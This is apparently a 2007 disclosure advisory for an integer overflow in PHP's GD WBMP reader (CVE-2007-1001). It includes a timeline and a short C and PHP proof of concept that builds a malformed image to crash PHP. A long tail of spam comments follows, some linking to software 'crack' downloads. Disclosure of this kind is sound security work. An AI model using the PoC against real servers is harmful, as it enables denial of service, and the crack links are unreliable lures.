There is an integer overflow in PHP in ext/gd/libgd/wbmp.c in the function readwbmp. If large enough values are specified for wbmp image height and/or width, so that width*height > 2^32, an integer overflow occurs on the following line
if ((wbmp->bitmap = (int *) safe_emalloc(wbmp->width * wbmp->height, sizeof(int), 0)) == NULL)
causing the amount of memory allocated to be smaller than the amount of data to be read, subsequently causing buffer overflow (See the DoS PoC below).
Upon discovery, I first thought this to be a LibGD issue, however the file wbmp.c is changed in LibGD (as early as in version 2.0.33 released in 2004) and does not have this overflow.
As the only values written in memory upon exploiting this can be (int)0 and (int)1, exploiting this for anything other then DoS seems highly unlikely.
Timeline
Feb 14 2007 - Vulnerability discovered
Mar 7 2007 - Vendor contacted
Mar 7 2007 - Vendor responded, confirmed the bug and said they plan to fix it in PHP 5.2.2, which is to be released in April
Apr 7 2007 - Release of this advisory
Note: I was going to wait until the release of PHP 5.2.2 before publishing this, but seeing FrSIRT (and possibly others) already pubished it I am pushing the release forward a bit.
References
http://www.php.net/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001
http://www.frsirt.com/english/advisories/2007/1269
PoC
#define BUFSIZE 1000000
#include <stdio.h>
int main()
{
int c;
char buf[BUFSIZE];
FILE *fp = fopen("test.wbmp","w");
//write header
c = 0;
fputc(c,fp);
fputc(c,fp);
//write width = 2^32 / 4 + 1
c = 0x84;
fputc(c,fp);
c = 0x80;
fputc(c,fp);
fputc(c,fp);
fputc(c,fp);
c = 0x01;
fputc(c,fp);
//write height = 4
c = 0x04;
fputc(c,fp);
//write some data to cause overflow
fwrite(buf,sizeof(buf),1,fp);
fclose(fp);
}
<?php
$image = imagecreatefromwbmp('test.wbmp'); //overflow occurs
?>?
888 comments:
«Oldest ‹Older 801 – 888 of 888Very well explained Blog. Good work. Keep sharing this type of valuable information. Looking for the best php development services in Hyederabad at pocket friendly budget? Contact Cyanous software solutions now.
Best php development services in Hyderabad
Best software & web development company in Hyderabad
Thanks for sharing such good and informative content with all of us.
Automation Anywhere Training in Chennai
It is so nice blog. I was really satisfied by seeing this blog.
workday integration course india
workday online integration course
Best Tally Course training institute in gurgaon
https://www.bestforlearners.com/course/gurgaon/tally-course-training-institutes-in-gurgaon
Want to do
Data Science Course in Chennai with Certification Exam? Catch the best features of Data Science training courses with Infycle Technologies, the best Data Science Training & Placement institutes in and around Chennai. Infycle offers the best hands-on training to the students with the revised curriculum to enhance their knowledge. In addition to the Certification & Training, Infycle offers placement classes for personality tests, interview preparation, and mock interviews for clearing the interviews with the best records. To have all it in your hands, dial 7504633633 for a free demo from the experts
Tanks For Sharing...
Jual Thermal Oil (AMP) Asphalt Mixing Plant
Pusat Jual Thermal Oil Heater
jual thermal oil kapal
Jual Hot Thermal Oil - HTO
Jual Mesin Pemanas Asphalt
Fabrikasi Thermal oil
nice blog
best digital marketing agency
informative article
best digital marketing agency
Terimakasih Untuk artikelnya https://www.jualboiler.com/
jual Pipa Superheater Eropa
Distributor Pipa Benteler
Jual Pipa Tube Boiler EN 10216 DIN7175
thank you for ur blog
Web Designing Training Institute in Chennai
I feel really happy to have seen your webpage and look forward to so many more entertaining times reading here. Thanks once more for all the details.
Cloud Computing Syllabus
Infycle Technologies, the best software training institute in Chennai offers the No.1 Python Certification in Chennai for tech professionals. Apart from the Python Course, other courses such as Oracle, Java, Hadoop, Selenium, Android, and iOS Development, Big Data will also be trained with 100% hands-on training. After the completion of training, the students will be sent for placement interviews in the core MNC's. Dial 7502633633 to get more info and a free demo.
This is a truthful information you have delivered here, thanks for sharing keep your updates regularly with updated information. Best Manpower Recruitment Company for PHP.
Hey thanks for sharing a great article in this blog page. It's very nice define every steps. You can visit here for know about which are the Best Web Designing Companies in India.
Wonderful post and more informative!keep sharing Like this!
Benefits of using PHP frameworks
PHP Developer
Thank you for taking the time to provide us with your valuable information. We strive to provide our candidates with excellent care and we take your comments to heart
Best Institute for Software Training Course in Delhi, India
Thank you so much for sharing these amazing tips. I must say you are an incredible writer, I love the way that you describe the things. Please keep sharing.
Core to Advanced AutoCAD training institute in Delhi, NCR
Advanced Excel Training, MIS & VBA Macros Training Institute
It’s always so sweet and also full of a lot of fun for me personally and my office colleagues to search your blog a minimum of thrice in a week to see the new guidance you have got.
Tableau Training in Chennai
Hey thanks for sharing this article post in this page.
It's very important for me.
You can visit here for Ecommerce website development company in Delhi
Excellent Blog, I like your blog and It is very informative. Thank you.
Visit us: RPA Ui Path Online Training
Visit us: Ui Path Course Online
It is nice post and I found some interesting information on this blog, keep it up. Thanks for sharing. . .
PHP Database Development in India
We have gained a good reputation by serving our customers with the best chicken in the market. Also, because people can place individual and bulk orders directly through our website, the doorstep delivery has eased it out for the people to buy chicken products. You will get the frozen products of mutton, turkey, beef, chicken, etc. from us. The best quality of Halal meat that we sell is worth trying though.
brazilian chicken for sale
Wonderful post and more informative!keep sharing Like this!
PHP Training in Bangalore
php classes in pune
Appreciation! great post.
Archicad 25 Crack
Parallels Desktop 17 Crack
Bitdefender Total Security 2022 Crack
AVG Internet Security 2022 Crack
It's a superb article you've written here. Your article provided me with some unique and useful knowledge. Many thanks for bringing this post to our attention. PHP Training in delhi
Quick word to say thanks to you for those wonderful tips and hints you are showing on this site.
Cloud Computing Syllabus
Android Course Syllabus
I simply wanted to write down a quick word to say thanks to you for those wonderful tips and hints you are showing on this site
Java Course Syllabus
Thanks for sharing such a good and informative content to all of us.
pega testing course
pega testing online course
Good day. I was impressed with your article. Keep it up . You can also visit my site if you have time. Thank you and Bless you always.
Hire PHP framework Developer in India
Interesting blog thank you for sharing.
Best software training institute in Chennai.
microsoft azure certification in chennai
RPA Training in Chennai
DevOps Training in Chennai
Cloud-computing Training in Chennai
Ui-Path Training in Chennai
PHP Training in Chennai
Blue-Prsim Training in Chennai
Thanks for sharing such a good and informative content to all of us.
pega testing online training
pega testing course
This article explains to you the Scope of Digital Marketing in India 2020 and the career opportunities on Digital Marketing.
Nice blog thank you .For your Sharing It's a pleasure to read your post.It's full of information I'm looking for and I'd like to express that "The content of your post is awesome"
Aimore Tech is the Best Software training institute in chennai with 6+ years of experience. We are offering online and classroom training.
Oracle Training in Chennai
Oracle DBA Training in Chennai
Great Post! Thanks for sharing. Keep sharing such information.
php training in gurgaon
Angle is an online one-to-one interactive tuition platform for kids.Where a student can clear their doubts from handpicked qualified teachers. Pls visit the site below for more information:
https://anglebelearn.com/
Angle is an online one-to-one interactive tuition platform for kids. Where a student can clear their doubts from handpicked qualified teachers. Pls visit the site below for more information:
https://anglebelearn.com/
Thanks for sharing this information
SEO Services Agency in Hyderabad
Thanks for sharing this information
SMO Services Agency in Hyderabad
Hire PHP developers who have expertise in PHP frameworks, including Core PHP, Laravel, Zend, CakePHP, CodeIgniter, & Yii to name a few, and build the web application your business needs.
Devilbiss oxygen concentrator
Cpap machine
Bipap Machine
Oxygen rental
ecommerce application development company
best ecommerce website designers
tableau for data science training
python for data science training in chennai
data science with python training in chennai
data science and machine learning training
Are you looking for AWS Training in Delhi? AP2V Academy is the best option for you! We are one of the best AWS Training provider Academy in Delhi, India. We Also conduct DevOps Training, Python Training, GCP Course, Linux Courses training, etc. Online live interactive classrooms with lifetime recording videos & 24*7 support.
Turn curious visitors into paying customers with a team of web design Austin TX. Provide an eye-catching user experience on a website that converts.
Much obliged for sharing this brilliant substance. its extremely fascinating. Numerous web journals I see these days don't actually give whatever pulls in others however the manner in which you have plainly clarified everything it's truly awesome. There are loads of posts But your method of Writing is so Good and Knowledgeable. continue to post such helpful data and view my site too...
Fold n fly | Classic dart paper airplane | how to make a paper airplane that flies far and straight step by step | windfin | stable paper airplane | nakamura paper airplane | paper airplane templates for distance
SAP FICO Training In Noida
Excellent Article, I just read and shared it to my friends as it is very useful for everyone. I will learn a lot of new stuff right from this article. You can check our services of
ecommerce solutions
Thanks for sharing this helpful post. You can also get information about IT solutions company Mississauga, Managed IT Services Mississauga, cloud consulting services Mississauga, business solutions company Mississauga
I enjoy what you guys are usually up to. This sort of clever work and
coverage! Keep up the wonderful work guys I’ve added you guys to
my blog roll.
Thanks for sharing this.nice post.project center in chennai
best project center in chennai
Nice Blog ... Thanks for sharing it
Loved to read this
Python Training in Noida
Machine Learning Training in Noida
Summer Training in Noida
Data Science Training in Noida
Digital Marketing Training in Noida
Best Online Training Company
Nice article and I felt very happy after read this content.
Best Promotion Company in Punjab
Nice post, PHP has collection of errors so i am specifying some errors below.
PHP Fatal error: Composer detected issues in your platform: Your Composer dependencies require a PHP version “>= 8.0.2”
It's crucial to assess your talents, interests, strengths, and weaknesses before selecting a programme for job-oriented training. After completing job-oriented courses, you are able to establish your identity. Select the eNvent software Technology that is right for you to advance your career.
internship training
Nice post. Thanks for sharing! I want people to know just how good this information is in your article. It’s interesting content and Great work.
Affordable Interior Designer In Gurgaon
visit - lookobeauty
https://lookobeauty.com/best-interior-designer-in-gurgaon/
Thank you for sharing such a nice and interesting blog
Mulesoft Training in Hyderabad
Mulesoft Online Training
Very good blog with informative posts.
Share Market Classes
Your post is just outstanding! thanks for such a post,its really going great work.
MSBI Training in Chennai
SAP HANA Training in Chennai
Nice post
wordpress training in chennai
Amazing work. Please keep continue your good work and keep posting these interesting articles. this post is very helpful, Thanks you shared great content.full stack java training institutes in hyderabad
I want to thank you... for sharing that with us, Best Computer Institute in Delhi I want to thank you all for having real courage.
Thank you for sharing that with us, Mobile repairing Institute in Delhi
cute blog with colourful images, really I appreciate your works. All the articles are very interesting to read Motorcycle Ear Plugs , Musicians Earplugs
HI IAM CHARAN cute blog with colourful images, really I appreciate your works. All the articles are very interesting to read Motorcycle Ear Plugs , Musicians Earplugs
Good sharing with useful information, thanks Custom made erp software
Nice blog article , Thanks for sharing your article.
Java training institution with real-time projects
My friend advised me to read this post since it is really helpful for you. Then I came across this piece where they discuss Everything You Need to Know About Housekeeping and Ironing. My acquaintance also recommended roof cleaning services providers to me. He informed me that he used these individuals to schedule a house cleaning service. They performed a great job with Tarragindi Pressure Cleaning & House Washing.
Thanks for sharing this blog, it was very helpful and informative.
Thanks for sharing useful and informative article. This a good content.Keep sharing with us.
website designing course in rishikesh
nice imformation.it is very imformative blog.thanks for sharing.Python Course in Tilak Nagar
IC Brand Studio is the leading Search Engine Optimization company in Coimbatore. It doesn't matter even your previous services gone wrong because we're master of Google penalty recovery services. we specialize in a wide range of Digital Marketing and SEO services, that include local & national SEO, Ecommerce SEO, ON page optimization, OFF page optimization, Link Building, Technical SEO, from small businesses to big enterprises. Our certified SEO experts are well-skilled enough to get the best results on search engines to achieve your business goal.
Thanks for sharing this amazing blog. rpa online training
Thanks for sharing this: aws developer course
Thanks for sharing this amazing article. aws developer associate course
Great content. Thanks for sharing
Kindly visit us on asp.net application development company
The content reveals an integer overflow vulnerability in PHP <= 5.2.1's wbmp file handling, leading to potential memory allocation issues and buffer overflow. The flaw, identified in the readwbmp function of ext/gd/libgd/wbmp.c, arises when large dimensions cause memory miscalculation. Despite the CVE-2007-1001 assignment, exploiting beyond DoS seems unlikely. The timeline displays prompt vendor response, with a planned fix in PHP 5.2.2. The provided PoC demonstrates the issue. This concise comment highlights the vulnerability, its impact, response, and demonstration, emphasizing the significance of the issue and vendor's action.
Ultimate Data Analytics Training Course
Awesome blog. I enjoyed reading your articles. This is truly a great read for me. It Keep up the good work!Google could platform Training institute in hyderabad
Awesome blog. I enjoyed reading your articles. This is truly a great read for me. It Keep up the good work!France Study visa consultants in Hyderabad
Nice Blog Keep Posting.
React-js Training institute in Hyderabad
Great blog...Thanks for sharing
Best project center in Chennai
Thank you for your outstanding content. I gained a tremendous amount of knowledge from your most impressive post.Data science training in Hyderabad
I found the post to be good. The shared information are greatly appreciated
chauffeur service dubai
sandwich massage
Nice postbest java training courses in warangal
Post a Comment